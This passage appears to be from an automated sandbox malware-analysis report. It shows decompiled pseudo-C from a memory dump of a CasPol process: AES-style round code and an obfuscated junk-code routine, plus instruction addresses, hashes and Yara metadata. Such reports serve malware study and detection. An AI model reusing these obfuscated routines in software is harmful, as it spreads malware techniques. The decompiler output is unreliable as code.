				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
				asm("ror ebx, 0x8");
				asm("rol edi, 0x8");
				_t358 = _a8;
				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
				asm("ror ecx, 0x8");
				asm("rol edi, 0x8");
				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}



















                                                                                                                                                                                                                                                                                                                            0x00405843
                                                                                                                                                                                                                                                                                                                            0x00405852
                                                                                                                                                                                                                                                                                                                            0x0040585b
                                                                                                                                                                                                                                                                                                                            0x00405869
                                                                                                                                                                                                                                                                                                                            0x0040586d
                                                                                                                                                                                                                                                                                                                            0x00405876
                                                                                                                                                                                                                                                                                                                            0x00405887
                                                                                                                                                                                                                                                                                                                            0x0040588a
                                                                                                                                                                                                                                                                                                                            0x0040588f
                                                                                                                                                                                                                                                                                                                            0x00405898
                                                                                                                                                                                                                                                                                                                            0x004058a6
                                                                                                                                                                                                                                                                                                                            0x004058ab
                                                                                                                                                                                                                                                                                                                            0x004058b4
                                                                                                                                                                                                                                                                                                                            0x004058c4
                                                                                                                                                                                                                                                                                                                            0x004058e4
                                                                                                                                                                                                                                                                                                                            0x004058e7
                                                                                                                                                                                                                                                                                                                            0x004058f9
                                                                                                                                                                                                                                                                                                                            0x004058fe
                                                                                                                                                                                                                                                                                                                            0x00405913
                                                                                                                                                                                                                                                                                                                            0x00405930
                                                                                                                                                                                                                                                                                                                            0x00405933
                                                                                                                                                                                                                                                                                                                            0x00405944
                                                                                                                                                                                                                                                                                                                            0x00405959
                                                                                                                                                                                                                                                                                                                            0x00405979
                                                                                                                                                                                                                                                                                                                            0x0040597c
                                                                                                                                                                                                                                                                                                                            0x0040598e
                                                                                                                                                                                                                                                                                                                            0x004059ac
                                                                                                                                                                                                                                                                                                                            0x004059c9
                                                                                                                                                                                                                                                                                                                            0x004059cc
                                                                                                                                                                                                                                                                                                                            0x004059de
                                                                                                                                                                                                                                                                                                                            0x004059f3
                                                                                                                                                                                                                                                                                                                            0x004059f9
                                                                                                                                                                                                                                                                                                                            0x00405a01
                                                                                                                                                                                                                                                                                                                            0x00405a02
                                                                                                                                                                                                                                                                                                                            0x00405a05
                                                                                                                                                                                                                                                                                                                            0x00405a13
                                                                                                                                                                                                                                                                                                                            0x00405a23
                                                                                                                                                                                                                                                                                                                            0x00405a35
                                                                                                                                                                                                                                                                                                                            0x00405a47
                                                                                                                                                                                                                                                                                                                            0x00405a63
                                                                                                                                                                                                                                                                                                                            0x00405a76
                                                                                                                                                                                                                                                                                                                            0x00405a83
                                                                                                                                                                                                                                                                                                                            0x00405a94
                                                                                                                                                                                                                                                                                                                            0x00405aab
                                                                                                                                                                                                                                                                                                                            0x00405acd
                                                                                                                                                                                                                                                                                                                            0x00405ad0
                                                                                                                                                                                                                                                                                                                            0x00405ae1
                                                                                                                                                                                                                                                                                                                            0x00405afc
                                                                                                                                                                                                                                                                                                                            0x00405b13
                                                                                                                                                                                                                                                                                                                            0x00405b16
                                                                                                                                                                                                                                                                                                                            0x00405b28
                                                                                                                                                                                                                                                                                                                            0x00405b30
                                                                                                                                                                                                                                                                                                                            0x00405b45
                                                                                                                                                                                                                                                                                                                            0x00405b62
                                                                                                                                                                                                                                                                                                                            0x00405b65
                                                                                                                                                                                                                                                                                                                            0x00405b76
                                                                                                                                                                                                                                                                                                                            0x00405b9a
                                                                                                                                                                                                                                                                                                                            0x00405baa
                                                                                                                                                                                                                                                                                                                            0x00405bad
                                                                                                                                                                                                                                                                                                                            0x00405bbf
                                                                                                                                                                                                                                                                                                                            0x00405bd7
                                                                                                                                                                                                                                                                                                                            0x00405bda
                                                                                                                                                                                                                                                                                                                            0x00405bed
                                                                                                                                                                                                                                                                                                                            0x00405bfa
                                                                                                                                                                                                                                                                                                                            0x00405c0c
                                                                                                                                                                                                                                                                                                                            0x00405c24
                                                                                                                                                                                                                                                                                                                            0x00405c47
                                                                                                                                                                                                                                                                                                                            0x00405c4a
                                                                                                                                                                                                                                                                                                                            0x00405c5c
                                                                                                                                                                                                                                                                                                                            0x00405c71
                                                                                                                                                                                                                                                                                                                            0x00405c77
                                                                                                                                                                                                                                                                                                                            0x00405c77
                                                                                                                                                                                                                                                                                                                            0x00405c7a
                                                                                                                                                                                                                                                                                                                            0x00405c7a
                                                                                                                                                                                                                                                                                                                            0x00405a13
                                                                                                                                                                                                                                                                                                                            0x00405cde
                                                                                                                                                                                                                                                                                                                            0x00405ce7
                                                                                                                                                                                                                                                                                                                            0x00405cf5
                                                                                                                                                                                                                                                                                                                            0x00405d53
                                                                                                                                                                                                                                                                                                                            0x00405d5c
                                                                                                                                                                                                                                                                                                                            0x00405d6a
                                                                                                                                                                                                                                                                                                                            0x00405dcc
                                                                                                                                                                                                                                                                                                                            0x00405dd5
                                                                                                                                                                                                                                                                                                                            0x00405de2
                                                                                                                                                                                                                                                                                                                            0x00405de5
                                                                                                                                                                                                                                                                                                                            0x00405e31
                                                                                                                                                                                                                                                                                                                            0x00405e3d
                                                                                                                                                                                                                                                                                                                            0x00405e46
                                                                                                                                                                                                                                                                                                                            0x00405e53
                                                                                                                                                                                                                                                                                                                            0x00405e5a

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 70a1f4048452d61e395e339dec46de454370745690d9b2d6a67eb6b7bf2bc473
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8026E73E547164FE720DE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            Function 00421A58 Relevance: .3, Instructions: 266COMMONCrypto
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 55%
                                                                                                                                                                                                                                                                                                                            			E00421A58() {
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t36;
				intOrPtr _t37;
				intOrPtr _t39;
				intOrPtr _t40;
				signed char _t44;
				void* _t46;
				signed char _t47;
				void* _t50;
				signed int _t51;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				signed int _t57;
				signed int _t58;
				signed int _t71;

				asm("sbb ebx, 0x52fa1035");
				_t34 =  *0x9149a5f7;
				 *0x9149a5f7 = _t33;
				asm("sbb eax, [0xe3c4ff09]");
				asm("ror dword [0x8807cc64], 0x11");
				 *0xdd69a5ba =  *0xdd69a5ba >> 0xa0;
				 *0x4e36d9ff =  *0x4e36d9ff >> 0x48;
				_pop(_t36);
				asm("adc [0xa1bce2d], eax");
				_t57 = _t56 |  *0x295a8e96;
				 *0x7fd723d1 =  *0x7fd723d1 - _t36;
				_t51 = _t50 - 1;
				 *0xccae1704 =  *0xccae1704 | _t44;
				 *0xb350d589 =  *0xb350d589 + _t51;
				asm("scasb");
				_t54 = (_t52 & 0xbbb90962) - 1;
				_t47 = _t46 -  *0xc6d0503a;
				if(_t47 < 0) {
					asm("adc ebp, [0x2b27c171]");
					 *0x1b0ae56d =  *0x1b0ae56d >> 0xf0;
					asm("adc [0xc4e9270c], ch");
					if( *0x1b0ae56d >= 0) {
						__ebx =  *0x7797087c * 0x114a;
						 *0x8277630 =  *0x8277630 >> 0x86;
						_pop( *0x74fc5998);
						__ebp =  *0xdda39c9d;
						asm("rcr byte [0xf452d688], 0xf4");
						__ch = __ch ^  *0x7426122a;
						asm("sbb [0x28ed1983], edx");
						if(__al < 0x14) {
							 *0xb9eb495 =  *0xb9eb495 << 0xa;
							__edx = __edx + 0xc7cc42fc;
							_t22 = __edi;
							__edi =  *0x160e8f9d;
							 *0x160e8f9d = _t22;
							__ebx = __ebx &  *0x5cacd735;
							 *0x20fc502c =  *0x20fc502c - __bl;
							__ebx = __ebx -  *0x8d5d5f98;
							_push( *0x3bbea12e);
							__cl = __cl +  *0xe5ee3482;
							asm("cmpsw");
							__ebx = __ebx & 0xfe2b6498;
							__ecx = __ecx +  *0x18cf3501;
							asm("ror dword [0xba26651b], 0x23");
							 *0x49a1088f =  *0x49a1088f - __edx;
							__eax = 0x27740139;
							 *0x5f217f10 =  *0x5f217f10 << 0xa3;
							asm("adc [0x7861be83], edi");
							__bl =  *0x3d3c1eb2;
							 *0x1f6c342c =  *0x1f6c342c - __dh;
							asm("rcl byte [0x1ac8f2e6], 0x15");
							asm("rcr byte [0x4f87f0c6], 0x44");
							 *0xdce57084 =  *0xdce57084 + __ch;
							asm("sbb bl, 0x80");
							__ah = __ah &  *0xcb47ec12;
							__al = __al &  *0x23c067a8;
							__ecx = __esp;
							__ebx = __ebx |  *0xd24c3e95;
							__ah = __ah ^  *0x1452e982;
							__edi =  *0x160e8f9d + 1;
							__ecx = __ecx +  *0x8727818c;
							asm("sbb [0x16073ed9], ecx");
							_push(0x340645f0);
							asm("sbb cl, [0x6f6b9bb6]");
							_push(__ebp);
							asm("sbb al, 0xb4");
							if(__ecx == 0) {
								 *0xa4de8275 =  *0xa4de8275 << 0x4a;
								__esi = __esi ^  *0x2d3b512b;
								_push(__ebx);
								_t25 = __edi;
								__edi =  *0xd85537a1;
								 *0xd85537a1 = _t25;
								_push(__ecx);
								if((__esi & 0x96a45696) < 0) {
									 *0x9a2da379 =  *0x9a2da379 ^ __esi;
									__edi = __edi +  *0xd9122639;
									 *0xfd632f2c =  *0xfd632f2c ^ __bh;
									__esi = __esi + 1;
									__ebp = __ebp | 0xb78bf91e;
									__dl = __dl | 0x000000c6;
									if(__dl > 0) {
										__ebx = __ebx + 0x53a0d476;
										__esp = __esp -  *0xbbfdca8d;
										 *0x65b0dc00 =  *0x65b0dc00 >> 0x38;
										 *0x9e05f825 =  *0x9e05f825 >> 0x82;
										asm("sbb esi, [0x55315892]");
										_push( *0xc2055539);
										asm("lodsb");
										__edx =  *0x5553a6f;
										 *0x2e89ebe2 =  *0x2e89ebe2 | __dl;
										_push(__ebp);
										 *0x8de4ba05 =  *0x8de4ba05 - __esp;
										__bl = __bl & 0x00000030;
										_push(__ebp);
										_push( *0x81b59a05);
										__eax = 0x2774013a;
										_push(__ebp);
										_push( *0xe2ba4303);
										__cl = __cl -  *0x509c4104;
										__cl = __cl &  *0x8d0104e2;
										__edi = __edi - 1;
										 *0x6f5704e2 =  *0x6f5704e2 << 0x39;
										__ebp = __ebp + 1;
										__dh = __dh &  *0x76e804e2;
										__edi = __edi + 1;
										__cl = __cl ^ 0x000000e2;
										asm("adc esp, [0x92ecc505]");
										__esp = __esp + 1;
										__ecx = __ecx & 0x75c43105;
										 *0x8405553a =  *0x8405553a >> 0x7d;
										 *0x553c7cc2 = __ebp;
										 *0xe650cb07 = __esi;
										__ah = __ah & 0x000000ca;
										_t26 = __bh;
										__bh =  *0x7861784;
										 *0x7861784 = _t26;
										 *0xe51073ed =  *0xe51073ed - 0x27740139;
										 *0x7861589 =  *0x7861589 >> 0xb2;
										__edi = __edi +  *0xc3a712c2;
										__edx =  *0x7861b93;
										 *0x7861b93 =  *0x5553a6f;
										_pop( *0x14e337cb);
										asm("rol dword [0x8861336], 0x7f");
										asm("sbb ebp, [0xc7fb40f7]");
										_push( *0xf4ddf96c);
										__edi = __edi & 0xb0eeeb11;
										__esi = 0x35659fa9;
										__ebx = __ebx -  *0x243bc7f8;
										asm("adc ch, 0x14");
										__ebx = 0x74850bb;
										asm("scasd");
										__bh =  *0x7861784 & 0x00000014;
										__esi = 0x793e3972;
										_push(__esp);
										__bh =  *0xf21f6ea8;
										 *0x566bfa80 =  *0x566bfa80 | __dl;
										__ebx = 0x74850bb -  *0x7acedaf3;
										asm("rcr dword [0x128c0a92], 0x51");
										__ecx = __ecx -  *0xe5eb0f16;
										asm("rol dword [0x1361c4d6], 0x56");
										 *0xad8bfcd2 =  *0xad8bfcd2 >> 0x86;
										__edi = __edi + 1;
										__ebp = __ebp |  *0x2a9ccad6;
										asm("cmpsw");
										__edi = __edi ^  *0xb4fed90b;
										__ah = __ah &  *0xce45fa80;
										 *0x87b8cc06 =  *0x87b8cc06 - __edx;
										__dh = __dh ^  *0xc6c4d38;
										asm("movsb");
										__ah =  *0xd5c0acb7;
										__ecx = __ecx +  *0xfc8a6f1b;
										__esp = __esp -  *0x7fd3493;
										_t30 = __edx;
										__edx =  *0xcc83e4c0;
										 *0xcc83e4c0 = _t30;
										 *0x168658d3 =  *0x168658d3 - 0x35659fa9;
										__ebx = 0x74850bb -  *0x7acedaf3 - 1;
										 *0x715539ff =  *0x715539ff ^ __ecx;
										if( *0x715539ff >= 0) {
											__edi =  *0x329657c * 0x1bb9;
											__ecx =  *0x1cec9a60 * 0x406b;
											asm("adc [0xc05b11e1], al");
											_push(0x35659fa9);
											 *0xf2f6e8cc =  *0xf2f6e8cc << 2;
											__ah =  *0x8ca359e1;
											asm("rcr byte [0x96dcbc6], 0x2b");
											__edx = __edx - 1;
											asm("scasd");
											asm("adc cl, 0x1c");
											__ch = __ch | 0x000000e5;
											_t31 = __bl;
											__bl =  *0x36b5c7e0;
											 *0x36b5c7e0 = _t31;
											__ecx = 1 +  *0x1cec9a60 * 0x406b;
											asm("rcr dword [0x66418594], 0x4c");
											__esp = __esp + 0x434390db;
											asm("rcr dword [0x15a662f], 0xe3");
											 *0xc910e6ec =  *0xc910e6ec << 0xc4;
											__edi =  *0xda71b703;
											asm("rcl byte [0x6fe6b620], 0x68");
											__bl = 0xb4;
											__edx =  *0xa4678798;
											__esp =  *0x6322cc1e;
											 *0x68dfcd38 =  *0x68dfcd38 >> 0x9b;
											__ebx = __ebx + 0x67cb9a9d;
											asm("sbb esp, 0x83cff40b");
											asm("rol dword [0x4f263916], 0x4a");
										}
									}
								}
							}
						}
					}
				}
				L1:
				 *0x43524309 =  *0x43524309 & _t58;
				asm("sbb dh, 0xe7");
				asm("sbb edx, 0x82220d1b");
				if(( *0xe943ed04 & _t47) < 0) {
					_t37 =  *0x5f4f9371;
					asm("rcl byte [0x1d77d2e4], 0xcb");
					_push(0xc3526c8);
					 *0xf2718031 =  *0xf2718031 << 0x6b;
					_push( *0x768df2d5);
					_t58 = _t58 +  *0xfd6fb6f8;
					asm("adc [0xf0f70d08], cl");
					if(_t58 >= 0) {
						asm("sbb ebp, 0xaf302878");
						_t39 =  *0xd555c1d;
						 *0xd555c1d = _t37 + 0x26f805f4;
						asm("rol dword [0xd4fd1f0d], 0x47");
						_t54 = _t54 ^  *0x8c671335;
						_t51 = _t51 +  *0x1e3a4d21;
						_t11 = _t57;
						_t57 =  *0x9702ba6e;
						 *0x9702ba6e = _t11;
						asm("cmpsw");
						if( *0x2a496f10 >= _t47) {
							_t40 = _t39 - 0xe9067f78;
							 *0xe9afa29f =  *0xe9afa29f - _t34;
							_t44 = _t44 -  *0xa6b6bd0a;
							_t51 = _t51 & 0x151a3439;
							_t71 = _t51;
							asm("rcr byte [0x904410a], 0x15");
							asm("adc edx, [0x6ec2c2b9]");
							if(_t71 >= 0) {
								_t12 = _t47;
								_t47 =  *0xcc44272;
								 *0xcc44272 = _t12;
								_t51 = 0xc568051b;
								if(_t71 == 0) {
									_t34 = _t34 - 0xa553675;
									 *0xd2b9e192 = _t40;
									asm("rol dword [0xdf2fc60f], 0x91");
									_t57 = _t57 &  *0xf809aa31;
									 *0x24d95062 =  *0x24d95062 >> 0xd4;
									 *0x12a951cc =  *0x12a951cc << 0xdb;
									_t44 =  *0xde75bbeb;
									_t18 = (_t47 &  *0xd03e682) - 0xe2;
									_t47 =  *0xaea0fc25;
									 *0xaea0fc25 = _t18;
									asm("sbb eax, 0x18d67083");
									asm("cmpsw");
									_t54 = 0x047197fa &  *0x5d967e2b;
									if(0x47197fa != 0) {
										asm("sbb ecx, [0x965cf74]");
										 *0x16c6af0 =  *0x16c6af0 + _t57;
										if( *0x16c6af0 > 0 &&  *0xd215827e * 0x46ab < 0) {
											_t19 = _t47;
											_t47 =  *0x9d4a1571;
											 *0x9d4a1571 = _t19;
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}




















                                                                                                                                                                                                                                                                                                                            0x00421a5d
                                                                                                                                                                                                                                                                                                                            0x00421a63
                                                                                                                                                                                                                                                                                                                            0x00421a63
                                                                                                                                                                                                                                                                                                                            0x00421a6f
                                                                                                                                                                                                                                                                                                                            0x00421a75
                                                                                                                                                                                                                                                                                                                            0x00421a7c
                                                                                                                                                                                                                                                                                                                            0x00421a89
                                                                                                                                                                                                                                                                                                                            0x00421a90
                                                                                                                                                                                                                                                                                                                            0x00421a91
                                                                                                                                                                                                                                                                                                                            0x00421a97
                                                                                                                                                                                                                                                                                                                            0x00421a9d
                                                                                                                                                                                                                                                                                                                            0x00421aa3
                                                                                                                                                                                                                                                                                                                            0x00421aa4
                                                                                                                                                                                                                                                                                                                            0x00421aaa
                                                                                                                                                                                                                                                                                                                            0x00421ab0
                                                                                                                                                                                                                                                                                                                            0x00421ab1
                                                                                                                                                                                                                                                                                                                            0x00421ab8
                                                                                                                                                                                                                                                                                                                            0x00421abe
                                                                                                                                                                                                                                                                                                                            0x00421ac4
                                                                                                                                                                                                                                                                                                                            0x00421aca
                                                                                                                                                                                                                                                                                                                            0x00421ad1
                                                                                                                                                                                                                                                                                                                            0x00421ad7
                                                                                                                                                                                                                                                                                                                            0x00421add
                                                                                                                                                                                                                                                                                                                            0x00421ae7
                                                                                                                                                                                                                                                                                                                            0x00421aee
                                                                                                                                                                                                                                                                                                                            0x00421af4
                                                                                                                                                                                                                                                                                                                            0x00421afa
                                                                                                                                                                                                                                                                                                                            0x00421b01
                                                                                                                                                                                                                                                                                                                            0x00421b0c
                                                                                                                                                                                                                                                                                                                            0x00421b14
                                                                                                                                                                                                                                                                                                                            0x00421b26
                                                                                                                                                                                                                                                                                                                            0x00421b2d
                                                                                                                                                                                                                                                                                                                            0x00421b33
                                                                                                                                                                                                                                                                                                                            0x00421b33
                                                                                                                                                                                                                                                                                                                            0x00421b33
                                                                                                                                                                                                                                                                                                                            0x00421b39
                                                                                                                                                                                                                                                                                                                            0x00421b40
                                                                                                                                                                                                                                                                                                                            0x00421b46
                                                                                                                                                                                                                                                                                                                            0x00421b4c
                                                                                                                                                                                                                                                                                                                            0x00421b53
                                                                                                                                                                                                                                                                                                                            0x00421b59
                                                                                                                                                                                                                                                                                                                            0x00421b5b
                                                                                                                                                                                                                                                                                                                            0x00421b61
                                                                                                                                                                                                                                                                                                                            0x00421b67
                                                                                                                                                                                                                                                                                                                            0x00421b6e
                                                                                                                                                                                                                                                                                                                            0x00421b74
                                                                                                                                                                                                                                                                                                                            0x00421b79
                                                                                                                                                                                                                                                                                                                            0x00421b80
                                                                                                                                                                                                                                                                                                                            0x00421b86
                                                                                                                                                                                                                                                                                                                            0x00421b98
                                                                                                                                                                                                                                                                                                                            0x00421ba5
                                                                                                                                                                                                                                                                                                                            0x00421bac
                                                                                                                                                                                                                                                                                                                            0x00421bb3
                                                                                                                                                                                                                                                                                                                            0x00421bb9
                                                                                                                                                                                                                                                                                                                            0x00421bbc
                                                                                                                                                                                                                                                                                                                            0x00421bc2
                                                                                                                                                                                                                                                                                                                            0x00421bc8
                                                                                                                                                                                                                                                                                                                            0x00421bc9
                                                                                                                                                                                                                                                                                                                            0x00421bcf
                                                                                                                                                                                                                                                                                                                            0x00421bd5
                                                                                                                                                                                                                                                                                                                            0x00421bd6
                                                                                                                                                                                                                                                                                                                            0x00421bdc
                                                                                                                                                                                                                                                                                                                            0x00421be2
                                                                                                                                                                                                                                                                                                                            0x00421be7
                                                                                                                                                                                                                                                                                                                            0x00421bed
                                                                                                                                                                                                                                                                                                                            0x00421bee
                                                                                                                                                                                                                                                                                                                            0x00421bf0
                                                                                                                                                                                                                                                                                                                            0x00421bf6
                                                                                                                                                                                                                                                                                                                            0x00421bfd
                                                                                                                                                                                                                                                                                                                            0x00421c03
                                                                                                                                                                                                                                                                                                                            0x00421c0a
                                                                                                                                                                                                                                                                                                                            0x00421c0a
                                                                                                                                                                                                                                                                                                                            0x00421c0a
                                                                                                                                                                                                                                                                                                                            0x00421c10
                                                                                                                                                                                                                                                                                                                            0x00421c11
                                                                                                                                                                                                                                                                                                                            0x00421c17
                                                                                                                                                                                                                                                                                                                            0x00421c1d
                                                                                                                                                                                                                                                                                                                            0x00421c23
                                                                                                                                                                                                                                                                                                                            0x00421c29
                                                                                                                                                                                                                                                                                                                            0x00421c2a
                                                                                                                                                                                                                                                                                                                            0x00421c30
                                                                                                                                                                                                                                                                                                                            0x00421c33
                                                                                                                                                                                                                                                                                                                            0x00421c39
                                                                                                                                                                                                                                                                                                                            0x00421c3f
                                                                                                                                                                                                                                                                                                                            0x00421c45
                                                                                                                                                                                                                                                                                                                            0x00421c4c
                                                                                                                                                                                                                                                                                                                            0x00421c53
                                                                                                                                                                                                                                                                                                                            0x00421c5f
                                                                                                                                                                                                                                                                                                                            0x00421c65
                                                                                                                                                                                                                                                                                                                            0x00421c66
                                                                                                                                                                                                                                                                                                                            0x00421c6c
                                                                                                                                                                                                                                                                                                                            0x00421c72
                                                                                                                                                                                                                                                                                                                            0x00421c73
                                                                                                                                                                                                                                                                                                                            0x00421c79
                                                                                                                                                                                                                                                                                                                            0x00421c7c
                                                                                                                                                                                                                                                                                                                            0x00421c7d
                                                                                                                                                                                                                                                                                                                            0x00421c83
                                                                                                                                                                                                                                                                                                                            0x00421c84
                                                                                                                                                                                                                                                                                                                            0x00421c85
                                                                                                                                                                                                                                                                                                                            0x00421c8b
                                                                                                                                                                                                                                                                                                                            0x00421c91
                                                                                                                                                                                                                                                                                                                            0x00421c97
                                                                                                                                                                                                                                                                                                                            0x00421c98
                                                                                                                                                                                                                                                                                                                            0x00421c9f
                                                                                                                                                                                                                                                                                                                            0x00421ca0
                                                                                                                                                                                                                                                                                                                            0x00421ca6
                                                                                                                                                                                                                                                                                                                            0x00421ca7
                                                                                                                                                                                                                                                                                                                            0x00421caa
                                                                                                                                                                                                                                                                                                                            0x00421cb0
                                                                                                                                                                                                                                                                                                                            0x00421cb2
                                                                                                                                                                                                                                                                                                                            0x00421cb8
                                                                                                                                                                                                                                                                                                                            0x00421cbf
                                                                                                                                                                                                                                                                                                                            0x00421cc5
                                                                                                                                                                                                                                                                                                                            0x00421ccb
                                                                                                                                                                                                                                                                                                                            0x00421cce
                                                                                                                                                                                                                                                                                                                            0x00421cce
                                                                                                                                                                                                                                                                                                                            0x00421cce
                                                                                                                                                                                                                                                                                                                            0x00421cd4
                                                                                                                                                                                                                                                                                                                            0x00421cda
                                                                                                                                                                                                                                                                                                                            0x00421ce1
                                                                                                                                                                                                                                                                                                                            0x00421ce7
                                                                                                                                                                                                                                                                                                                            0x00421ce7
                                                                                                                                                                                                                                                                                                                            0x00421ced
                                                                                                                                                                                                                                                                                                                            0x00421cf3
                                                                                                                                                                                                                                                                                                                            0x00421cfa
                                                                                                                                                                                                                                                                                                                            0x00421d00
                                                                                                                                                                                                                                                                                                                            0x00421d06
                                                                                                                                                                                                                                                                                                                            0x00421d0c
                                                                                                                                                                                                                                                                                                                            0x00421d11
                                                                                                                                                                                                                                                                                                                            0x00421d17
                                                                                                                                                                                                                                                                                                                            0x00421d1a
                                                                                                                                                                                                                                                                                                                            0x00421d20
                                                                                                                                                                                                                                                                                                                            0x00421d21
                                                                                                                                                                                                                                                                                                                            0x00421d24
                                                                                                                                                                                                                                                                                                                            0x00421d2a
                                                                                                                                                                                                                                                                                                                            0x00421d2b
                                                                                                                                                                                                                                                                                                                            0x00421d31
                                                                                                                                                                                                                                                                                                                            0x00421d37
                                                                                                                                                                                                                                                                                                                            0x00421d3d
                                                                                                                                                                                                                                                                                                                            0x00421d44
                                                                                                                                                                                                                                                                                                                            0x00421d4a
                                                                                                                                                                                                                                                                                                                            0x00421d51
                                                                                                                                                                                                                                                                                                                            0x00421d58
                                                                                                                                                                                                                                                                                                                            0x00421d59
                                                                                                                                                                                                                                                                                                                            0x00421d5f
                                                                                                                                                                                                                                                                                                                            0x00421d61
                                                                                                                                                                                                                                                                                                                            0x00421d67
                                                                                                                                                                                                                                                                                                                            0x00421d73
                                                                                                                                                                                                                                                                                                                            0x00421d79
                                                                                                                                                                                                                                                                                                                            0x00421d7f
                                                                                                                                                                                                                                                                                                                            0x00421d80
                                                                                                                                                                                                                                                                                                                            0x00421d86
                                                                                                                                                                                                                                                                                                                            0x00421d8c
                                                                                                                                                                                                                                                                                                                            0x00421d92
                                                                                                                                                                                                                                                                                                                            0x00421d92
                                                                                                                                                                                                                                                                                                                            0x00421d92
                                                                                                                                                                                                                                                                                                                            0x00421d98
                                                                                                                                                                                                                                                                                                                            0x00421d9e
                                                                                                                                                                                                                                                                                                                            0x00421d9f
                                                                                                                                                                                                                                                                                                                            0x00421da5
                                                                                                                                                                                                                                                                                                                            0x00421dab
                                                                                                                                                                                                                                                                                                                            0x00421dbb
                                                                                                                                                                                                                                                                                                                            0x00421dc5
                                                                                                                                                                                                                                                                                                                            0x00421dcb
                                                                                                                                                                                                                                                                                                                            0x00421dcc
                                                                                                                                                                                                                                                                                                                            0x00421dd3
                                                                                                                                                                                                                                                                                                                            0x00421dd9
                                                                                                                                                                                                                                                                                                                            0x00421de0
                                                                                                                                                                                                                                                                                                                            0x00421de1
                                                                                                                                                                                                                                                                                                                            0x00421de2
                                                                                                                                                                                                                                                                                                                            0x00421de5
                                                                                                                                                                                                                                                                                                                            0x00421dee
                                                                                                                                                                                                                                                                                                                            0x00421dee
